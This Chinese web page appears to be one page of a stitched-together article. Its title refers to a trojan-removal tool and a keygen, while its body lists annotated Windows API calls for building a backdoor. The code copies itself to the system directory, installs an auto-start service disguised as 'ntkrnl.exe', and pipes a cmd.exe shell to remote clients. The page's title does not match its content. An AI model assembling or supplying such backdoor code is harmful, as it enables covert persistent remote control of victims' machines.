木马清除大师怎么样_木马清除大师靠谱吗_木马清除大师v8注册机(8)

ServiceStatus.dwCurrentState = SERVICE_RUNNING;

SetServiceStatus(ServiceStatusHandle,&ServiceStatus)；

//设置服务的当前状态为SERVICE_RUNNING；

hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);

//创建服务主线程，实现后门功能；

WaitForSingleObject(hMutex,INFINITE);

//等待互斥量，控制全局变量的同步使用；

TerminateProcess(lpProcessDataHead->hProcess,1);

//终止创建的Cmd进程；

hSearch=FindFirstFile(lpImagePath,&FileData);

//查找系统目录下服务程序的文件是否已经存在；

GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);

//获得当前进程的程序文件名；

CopyFile(lpCurrentPath,lpImagePath,FALSE);

//复制文件到系统目录下；

schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);

//打开服务控制管理器；

CreateService(schSCManager,"ntkrnl","ntkrnl",

SERVICE_ALL_ACCESS,SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,

SERVICE_ERROR_IGNORE,

"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL);

//创建服务，参数包括名称，服务类型，开始类型，错误类型及文件路径等；

schService=OpenService(schSCManager,"ntkrnl",SERVICE_START);

//如果服务已经创建，则打开服务；

StartService(schService,0,NULL);

//启动服务进程；

ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus);

//控制服务状态；

DeleteService(schService);

//卸载服务程序；

DeleteFile(lpImagePath);

//删除文件；

3.后门程序相关函数

hMutex=CreateMutex(NULL,FALSE,NULL);

//创建互斥量；

hThread=CreateThread(NULL,0,CmdShell,(LPVOID)&sClient,0,NULL);

//创建处理客户端访问的重定向输入输出线程；

CreatePipe(&hReadPipe,&hReadShell,&saPipe,0);

CreatePipe(&hWriteShell,&hWritePipe,&saPipe,0);

//创建用于进程间通信的输入/输出管道；

CreateProcess(lpImagePath,NULL,NULL,NULL,TRUE,0,NULL,NULL,&lpStartupInfo,&lpProcessInfo);

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/ruanjian/article-35588-8.html